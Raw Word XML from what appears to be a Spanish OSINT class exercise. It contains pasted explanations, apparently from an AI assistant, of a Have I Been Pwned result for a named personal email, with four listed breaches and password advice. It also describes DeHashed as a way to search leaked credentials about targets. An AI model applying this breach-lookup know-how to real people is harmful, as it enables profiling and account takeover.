    <w:p w14:paraId="4DD2C07B" w14:textId="7529B5B3" w:rsidR="00991477" w:rsidRDefault="00991477" w:rsidP="00C35F29">
      <w:r w:rsidRPr="00991477">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C2C8E3C" wp14:editId="3D2EA8A2">
            <wp:extent cx="6858000" cy="3956050"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="125549365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3654" name="Imagen 1" descr="Captura de pantalla de un celular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FD25" w14:textId="240DA0B2" w:rsidR="006027BA" w:rsidRDefault="006027BA" w:rsidP="00C35F29">
      <w:r w:rsidRPr="006027BA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39DA9100" wp14:editId="4DBCCE8A">
            <wp:extent cx="2606266" cy="2385267"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="8969857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8578" name="Imagen 1" descr="Diagrama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B828" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="65C585FF" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="0C7F9261" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="6D3BDCE4" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="110A8D2E" w14:textId="44E4CA54" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69DC623C" wp14:editId="05017E81">
            <wp:extent cx="6850380" cy="3406140"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="1079248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CFFAA" wp14:editId="50102BC5">
            <wp:extent cx="6858000" cy="3855720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7039771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C3AAA3" wp14:editId="27AF07ED">
            <wp:extent cx="6858000" cy="3604260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="949828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A81F8" wp14:editId="06288258">
            <wp:extent cx="6850380" cy="3611880"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="10335693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6DA02" wp14:editId="40044C64">
            <wp:extent cx="6858000" cy="3665220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19949523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1BA1C" wp14:editId="09816AA4">
            <wp:extent cx="6850380" cy="3985260"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="133522137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C701" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="556F6279" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="00734E23" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="46AC1C99" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="35B9C755" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F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5B55" w14:paraId="24F62D2C" w14:textId="77777777" w:rsidTr="00D75B55">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2156A7AF" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Veo que cambiaste a una herramienta diferente. Ahora estás en **Have I Been Pwned** (HIBP), que es un servicio para verificar si tu correo electrónico ha sido comprometido en filtraciones de datos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="146BA9BC" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55"/>
          <w:p w14:paraId="015B5DE1" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRPr="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D75B55">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>## ¿Qué es Have I Been Pwned?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="292D2647" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRPr="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="44224BB5" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>**Have I Been Pwned** es una plataforma creada por Troy Hunt que te permite verificar si tu dirección de correo electrónico o contraseña ha sido expuesta en brechas de seguridad conocidas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72BF42E5" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55"/>
          <w:p w14:paraId="2E762F26" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>## Lo que muestran tus imágenes:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06FB8446" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55"/>
          <w:p w14:paraId="7A0E1F22" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>El correo **ricky201325@gmail.com** ha sido encontrado en **4 filtraciones de datos**:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ACD53EA" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55"/>
          <w:p w14:paraId="0218F587" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>### 1. **Internet Archive** (Septiembre 2024)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="128FF464" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>- 31 millones de registros expuestos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="379F6A96" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>- **Datos comprometidos:**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79C8C731" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Direcciones de correo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="268EA6AD" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Contraseñas (hashes bcrypt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="499D08B3" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Nombres de usuario</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28638A4E" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55"/>
          <w:p w14:paraId="0DBD8C8F" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>### 2. **Wattpad** (Junio 2020)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BC60298" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>- 270 millones de registros expuestos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="365E6759" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>- **Datos comprometidos:**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EAF8AE9" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Biografías</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F70F4B9" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Fechas de nacimiento</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B691C25" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Direcciones de correo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A69A776" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Género</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="124A22A0" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Ubicaciones geográficas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="411F15EA" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Direcciones IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="609877EA" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Nombres</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="543D37E7" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Contraseñas (hashes bcrypt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B968856" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Perfiles de redes sociales</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68F928E6" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - URLs de sitios web</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39A301B5" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Nombres de usuario</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D8543C9" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55"/>
          <w:p w14:paraId="3C86575A" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>### 3. **Mathway** (Enero 2020)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D1EFAA" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>- 25 millones de registros expuestos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78E409AC" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>- **Datos comprometidos:**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F53FF2C" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Información de dispositivos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34712635" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Direcciones de correo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D39651" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Nombres</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="173AA42E" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Contraseñas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FB92AD7" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Perfiles de redes sociales</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DAD4170" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55"/>
          <w:p w14:paraId="3AB43C88" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>### 4. **Canva** (Mayo 2019)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F82F4E4" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>- 137 millones de suscriptores afectados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DF98D3E" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>- **Datos comprometidos:**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79AC691F" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Direcciones de correo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6649D627" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Ubicaciones geográficas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39A974CE" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Nombres</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34F2C61F" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Contraseñas (hashes bcrypt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60A77172" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t xml:space="preserve">  - Nombres de usuario</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12B8089F" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55"/>
          <w:p w14:paraId="392F65F2" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>## ¿Qué deberías hacer?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A66D8DE" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55"/>
          <w:p w14:paraId="069AA254" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>1. **Cambiar contraseñas inmediatamente** en todos estos servicios</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="755236A5" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>2. **Usar contraseñas únicas** para cada servicio</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E0758BE" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>3. **Activar autenticación de dos factores (2FA)** donde sea posible</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AE45428" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>4. **Usar un gestor de contraseñas** (como Bitwarden, LastPass, 1Password)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="147D4200" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>5. Hacer clic en **"Notify Me"** para recibir alertas de futuras filtraciones</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2459A7B5" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55"/>
          <w:p w14:paraId="18919B0E" w14:textId="1E839CF4" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
            <w:r>
              <w:t>¿Necesitas que te explique cómo usar esta información en Maltego para una investigación OSINT?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10073B71" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="6DC55DE9" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="5F2D11F5" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="07BCEACA" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="7D0E7753" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="5DFE3888" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="2CC21CAF" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="1A90EA10" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="1FB08B12" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="263959CD" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="2CE57854" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="6B9EA986" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="15524994" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="1C8D9D52" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="47EB612C" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="702CB4CE" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="5D326716" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="11B5C696" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="081A21E7" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="47728785" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="311A9009" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="22BD7474" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="1F0FA300" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="61922673" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="4AF4D3EE" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="342ED338" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="0D14B595" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="4437EF11" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="1A91D538" w14:textId="77777777" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29"/>
    <w:p w14:paraId="629C7D11" w14:textId="7D5AFD4C" w:rsidR="0056618F" w:rsidRPr="00D013FF" w:rsidRDefault="0056618F" w:rsidP="0056618F">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0056618F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.9.2 https://dehashed.com/search#breachCheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DE6384" w14:textId="75783AA5" w:rsidR="0056618F" w:rsidRDefault="0056618F" w:rsidP="00C35F29">
      <w:r w:rsidRPr="0056618F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74C3B4E8" wp14:editId="03C98CC6">
            <wp:extent cx="6858000" cy="4343400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22193109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31099" name="Imagen 1" descr="Interfaz de usuario gráfica, Sitio web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414">
        <w:br/>
      </w:r>
      <w:r w:rsidR="008A3414" w:rsidRPr="008A3414">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="206ECADF" wp14:editId="4C27CB0C">
            <wp:extent cx="6858000" cy="2039620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1452893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33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6FA" w14:textId="77777777" w:rsidR="008A3414" w:rsidRDefault="008A3414" w:rsidP="00C35F29"/>
    <w:p w14:paraId="2C22D4DC" w14:textId="77777777" w:rsidR="008A3414" w:rsidRDefault="008A3414" w:rsidP="00C35F29"/>
    <w:p w14:paraId="50BA36A2" w14:textId="77777777" w:rsidR="008A3414" w:rsidRDefault="008A3414" w:rsidP="00C35F29"/>
    <w:p w14:paraId="21C3CEF9" w14:textId="77777777" w:rsidR="008A3414" w:rsidRDefault="008A3414" w:rsidP="00C35F29"/>
    <w:p w14:paraId="2FA89494" w14:textId="77777777" w:rsidR="008A3414" w:rsidRDefault="008A3414" w:rsidP="00C35F29"/>
    <w:p w14:paraId="7670CC03" w14:textId="77777777" w:rsidR="008A3414" w:rsidRDefault="008A3414" w:rsidP="00C35F29"/>
    <w:p w14:paraId="665E8BD2" w14:textId="77777777" w:rsidR="008A3414" w:rsidRDefault="008A3414" w:rsidP="00C35F29"/>
    <w:p w14:paraId="289C7DB5" w14:textId="77777777" w:rsidR="008A3414" w:rsidRDefault="008A3414" w:rsidP="00C35F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1F4C" w14:paraId="0307D66C" w14:textId="77777777" w:rsidTr="00B51F4C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B35A11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lastRenderedPageBreak/>
              <w:t>¿Qué es DeHashed?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39932CB2" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>DeHashed</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> es una herramienta de búsqueda de credenciales y datos filtrados que permite buscar información comprometida en brechas de seguridad. A diferencia de "Have I Been Pwned" que solo verifica si un email fue comprometido, DeHashed te permite </w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>buscar y acceder a los datos específicos</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> que fueron filtrados.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E267F6E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¿Para qué se usa DeHashed?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F385D7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1. Investigaciones OSINT (Open Source Intelligence)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A624BA4" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Buscar información sobre objetivos específicos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57FCB7CE" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Encontrar correos electrónicos asociados a nombres o dominios</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="152442E3" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Descubrir nombres de usuario utilizados por una persona</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B26CB45" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Identificar posibles vectores de ataque</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A50D084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2. Auditorías de Seguridad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="595BFF24" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Verificar si las credenciales de empleados de una empresa han sido expuestas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3957E1D8" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Identificar cuentas corporativas comprometidas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B7FE62B" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Evaluar el riesgo de ataques de credential stuffing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74AE037E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3. Pentesting (Pruebas de Penetración)</w:t>
            </w:r>
          </w:p>
